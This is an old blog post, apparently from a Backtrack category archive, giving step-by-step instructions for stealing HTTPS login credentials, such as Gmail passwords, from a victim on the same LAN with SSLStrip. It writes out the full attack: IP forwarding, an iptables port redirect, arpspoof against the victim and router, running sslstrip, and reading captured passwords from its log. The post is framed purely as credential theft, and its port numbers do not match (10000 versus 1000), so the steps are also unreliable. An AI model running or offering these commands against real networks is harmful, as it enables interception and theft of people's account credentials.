RSS

Category Archives: Backtrack

Steal credentials in LAN – SSLStrip

SSLStrip can be used to steal gmail, facebook… (any https site) credentials in LAN.¬†Backtrack comes with a pre-installed SSLStrip.

Below steps explain the usage of SSLStrip to steal the credentials.
Attacker: Backtrack 4 linux machine
Victim: windows xp machine  

On Backtrack 4 terminal,

  • echo 1 > /proc/sys/net/ipv4/ip_forward
  • iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000
  • arpspoof -i eth0 -t victimip routerip

On other terminal:

  • sslstrip -l 1000

If you are using Backtrack 5, then do the following to start SSLStrip.

  • Go to start->info gathering->web app tools->ssl analysys->sslstrip
  • chmod +x sslstrip.py
  • Python sslstrip.py -l 1000

Now in windows xp machine, open a browser (IE). Type gmail and hit cntrl+enter.

Type username and password to log into your gmail.

By this time SSLStrip captures the credentials and stores it in sslstrip.log file. To view the log

On backtrack terminal:

  • cat sslstrip.log
To understand it in a better way watch this video -
 

Posted by on May 24, 2011 in Backtrack

9 Comments

Tags: , , , , , ,